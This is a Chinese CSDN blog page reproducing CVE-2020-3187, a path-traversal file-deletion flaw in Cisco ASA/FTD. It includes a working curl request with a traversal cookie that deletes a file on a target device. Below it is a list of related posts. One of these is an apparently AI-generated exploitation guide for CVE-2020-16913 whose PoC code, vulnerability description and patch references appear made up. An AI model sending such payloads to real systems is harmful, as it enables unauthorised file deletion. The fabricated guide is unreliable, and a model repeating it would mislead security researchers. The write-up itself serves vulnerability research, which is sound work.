CVE-2020-3187漏洞复现

已于 2022-06-20 13:13:25 修改
阅读量2.5k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2022-06-07 22:51:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiTaiShen/article/details/125175050
版权
本文详细介绍了CVE-2020-3187漏洞,涉及Cisco Firepower Threat Defense和Adaptive Security Appliances Software。该漏洞允许攻击者通过发送特制HTTP请求进行路径遍历,从而读取或删除系统敏感信息。文章包括漏洞简介、漏洞利用方法的POC演示以及厂商提供的修复措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2020-3187

漏洞简介

Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。 Cisco Firepower Threat Defense和Adaptive Security Appliances Software存在路径遍历漏洞,该漏洞源于程序未对HTTP URL进行正确的输入验证。攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。

漏洞利用

POC

 curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html

https:

了解本专栏 订阅专栏 解锁全文 超级会员免费看
复现CVE-2020-3452(CISCO ASA远程任意文件读取)
记录并分享学习安全的知识点..
04-27 1234
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 漏洞等级:中危。 二、影响版本 Cisco ASA:<= 9.6 Cisco ASA:9.7 ,...
Cisco ASA、FTD和HyperFlex HX的漏洞分析复现
不忘初心,护天下安全!
06-28 885
Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞,该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。Cisco ASA设备 Cisco FTD设备访问 http://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html 存在则可能出现此漏洞例如我们删除一张图片 http://xxx.xxx.xxx.xxx/+CSCOU+/cs
CVE-2020-3187(未经身份验证任意文件删除)
Huamang的博客
04-16 3131
https://ld246.com/article/1596629715461
CISCO ASA远程任意文件读取漏洞CVE-2020-3452)复现
玄道的网安博客
07-30 3059
简介 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 影响版本 Cisco ASA 设备影响版本: <9.6.1 9.6 < 9.6.4.42 9.71 9.8
Cisco漏洞复现(CVE-2021-1291)
The54No1的博客
08-29 1097
漏洞描述:Cisco Small Business RV160、RV160W、RV260、RV260P和RV260W VPN路由器的基于Web的管理界面中存在多个漏洞,使得未经验证的远程攻击者能够以根用户身份在受影响的设备上执行任意代码。之所以存在这些漏洞,是因为未正确验证HTTP请求。攻击者可以通过向受影响设备的基于Web的管理界面发送巧尽心思构建的HTTP请求来攻击这些漏洞。成功利用此漏洞可让攻击者在设备上远程执行任意代码。
CVE-2020-2957复现
克豪的博客
11-24 3228
Apache Shiro 628权限绕过漏洞CVE-2020-2957) 漏洞详情 CVE-2020-195身份认证绕过漏洞,可以用/hello/1/来绕过登录验证,此次漏洞在之前CVE-2020-1957补丁的基础上进行绕过,访问/hello/1/会进入登录认证,但是通过构造payload: /fdsf;/…/hello/1 可以绕过登录认证。 影响版本 Shiro <=1.5.1 漏洞分析 https://www.rednn.com/safe/202003/30176.html 原理:h.
我用一个例子疏通“路由器漏洞&复现”【建议收藏!!】
kali_Ma的博客
07-04 958
一、介绍 ​ 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 ​ “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” ​ Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞漏洞排名中位居前25。 IOS .
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
fortilogger_arbitrary_fileupload:CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit)
05-08
CVE-2021-3378 | FortiLogger-未经身份验证的任意文件上传(Metasploit) 日期:30-01-2021 漏洞利用作者:Berkan Er 供应商主页: : 软件链接: : 版本:4.4.2.2 经过测试:Windows 10 Enterprise x64 CVE:2021-3378 披露日期:26-02-2021 该模块通过不安全的POST请求利用未经身份验证的任意文件上传。 它已在Windows 10企业版4.4.2.2中进行测试。 更多详细信息: : POC:
proxylogscan:一种快速扫描Microsoft Exchange Server上漏洞的快速工具,它使攻击者可以绕过身份验证并冒充管理员(CVE-2021-26855)
03-12
代理日志扫描 此工具用于大规模扫描Microsoft Exchange Server上的漏洞,该漏洞使攻击者可以绕过身份验证并冒充管理员(CVE-2021-26855)。 通过将此漏洞与另一个身份验证后任意文件写入漏洞链接在一起,以执行代码(CVE-2021-27065)。 结果,未经身份验证的攻击者可以在Microsoft Exchange Server上执行任意命令。 此漏洞会影响(Exchange 2013版本<15.00.1497.012,Exchange 2016 CU18 <15.01.2106.013,Exchange 2016 CU19 <15.01.2176.009,Exchange 2019 CU7 <15.02.0721.013,Exchange 2019 CU8 <15.02.0792.010)。 默认情况下,所有组件都容易受到攻击。 安装 必须 。 $ g
Cisco ASA/FTD未授权文件删除漏洞简要分析
chennqqi的专栏
07-28 1943
漏洞简述思科官方在2020年5月6号发布Cisco Adaptive Security Appliance(ASA)和Firepower Threat Defense(FTD)软件web...
OpenSSL 安全漏洞(CVE-2023-3817)
m0_65198365的博客
03-07 1155
OpenSSL 安全漏洞(CVE-2023-3817) 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://www.openssl.org/news/secadv/20230731.txt
利用 CVE-2020-1938 读取webapp 下任意文件复现 以及源码调试分析
qq_41891666的博客
06-01 1215
利用 CVE-2020-1938 读取webapp 下任意文件复现 以及源码调试分析 前言: 之前挖src 的时候,想着用幽灵猫来挖,但是由于没有理解原理,导致测试的时候直接用脚本扫描出错了也一脸懵逼,所以想好好分析分析这个漏洞,全面了解原理,也学习学习tomcat 0x01 漏洞介绍 0x02 环境搭建: 1.下载tomcat: tomcat源码压缩包(https://archive.apache.org/dist/tomcat/tomcat-7/v7.0.99/src/apache-tomcat-7
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 7306
网络安全-CVE - CIS 漏洞分析以及解决
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
【Rainbow Network Technology co., LTD】
08-25 1782
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。
OpenSSL 3.x爆出漏洞,如何妥善应对?
AKAMAI_CHINA的博客
12-11 1271
在向安全团队告知即将发布的修复程序相关信息时,OpenSSL团队用了一种有趣的方法。这则公告为防御者留出了足够的准备时间,以便找出需要打补丁的关键系统。本文介绍的方法可以帮助大家找到可能受到影响的应用程序,并第一时间安装补丁以缓解风险。安全方面总会有层出不穷的新故事和事故,欢迎关注Akamai,第一时间了解新出现的安全威胁以及应对和缓解措施。
CVE-2020-16913漏洞复现
最新发布
03-09
<think>好的,我需要帮助用户复现CVE-2020-16913漏洞。首先,我要确认这个漏洞的具体信息。CVE-2020-16913是Microsoft Outlook的一个远程代码执行漏洞,由恶意特制文件触发。用户需要搭建实验环境并进行步骤复现。 首先,查阅资料,确认漏洞影响的版本。根据微软的公告,该漏洞影响Outlook 2010到2019的多个版本,所以实验环境需要安装这些版本中的一个,比如Office 2016。可能需要使用Windows 10作为操作系统,并安装受影响的Outlook版本。 接下来,搭建环境可能需要虚拟机,比如VMware或VirtualBox,安装Windows 10和Office 2016。确保系统没有安装2020年10月的安全更新,因为该补丁修复了这个漏洞。需要关闭自动更新,或者回滚到更新前的状态。 然后是漏洞利用部分。这个漏洞通过特制的文件触发,可能需要构造一个恶意的Outlook文件(如.msg或.rft)。根据公开的信息,漏洞涉及Rich Text Format (RTF)解析中的内存损坏问题。用户需要获取或编写PoC(概念验证)代码,生成恶意文件。可能需要参考已有的漏洞分析或利用代码,比如Exploit-DB或GitHub上的资源。 步骤可能包括:创建恶意RTF文件,通过邮件或其他方式发送到目标Outlook,当用户预览或打开该文件时触发漏洞。需要配置Outlook的安全设置,可能降低防护以允许漏洞触发,比如禁用受保护的视图。 需要注意的事项包括:实验应在隔离环境中进行,避免影响真实系统;确保遵守法律和道德准则;可能需要调试工具如WinDbg来分析崩溃和内存转储,确认漏洞触发成功。 另外,用户可能遇到的问题包括环境配置错误、补丁未正确卸载、PoC文件构造不正确等。需要指导用户如何验证漏洞是否存在,例如检查系统日志或使用漏洞扫描工具。 最后,生成相关问题,帮助用户进一步理解相关漏洞复现方法,比如如何分析漏洞的根本原因,防护措施,或其他相关CVE复现方法。</think>### CVE-2020-16913漏洞复现步骤 CVE-2020-16913是Microsoft Outlook的远程代码执行漏洞,攻击者通过构造恶意文件诱导用户预览或打开,可触发内存损坏并执行任意代码[^1]。以下是复现步骤: --- #### **1. 实验环境搭建** - **操作系统**:Windows 10(建议虚拟机环境,如VMware/VirtualBox) - **软件版本**:安装未修复该漏洞的Microsoft Outlook版本: - Outlook 2010/2013/2016/2019(版本需低于2020年10月安全更新) - **配置要求**: 1. 关闭Outlook自动更新(防止补丁修复漏洞) 2. 禁用Outlook“受保护的视图”(允许直接加载外部内容) --- #### **2. 漏洞触发条件** - 用户需通过邮件接收恶意构造的`.rtf`或`.msg`文件,并执行以下操作之一: - 预览邮件内容 - 直接打开附件文件 --- #### **3. 复现步骤** **步骤1:生成恶意文件** 1. 构造特制的Rich Text Format(RTF)文件,利用Outlook解析漏洞触发内存损坏。 - 可参考公开PoC代码(如GitHub仓库中的`CVE-2020-16913.py`)生成恶意文件[^2]。 - 示例代码片段: ```python # 生成恶意RTF头部,包含畸形对象指针 rtf_header = b'{\\rtf1\\ansi\\ansicpg1252\\fromhtml{\\*\htmltag}' exploit_payload = b'<img src="x:\\localhost\\C$\\...\\恶意DLL路径">' # 触发路径解析漏洞 ``` **步骤2:发送恶意文件** 1. 将生成的`.rtf`文件通过邮件发送至目标Outlook账户,或直接放置于共享目录诱导用户打开。 **步骤3:触发漏洞** 1. 在目标主机使用Outlook打开邮件或附件。 2. 观察行为: -漏洞触发成功,将导致内存越界写入,可能引发进程崩溃(如`OUTLOOK.EXE`停止响应)。 - 结合调试工具(如WinDbg)分析崩溃时的寄存器状态,确认EIP控制权获取情况。 --- #### **4. 关键验证点** - **漏洞验证**:通过崩溃地址确认是否触发漏洞。例如,若`EIP`指向可控内存区域,则证明漏洞可利用。 - **防护绕过**:需关闭Outlook的“受保护视图”和“附件安全检查”功能[^3]。 --- #### **5. 修复建议** - 安装微软2020年10月安全更新(KB4486740/KB4486745)[^4]。 - 启用Outlook的“阻止外部内容”策略。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

初岄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值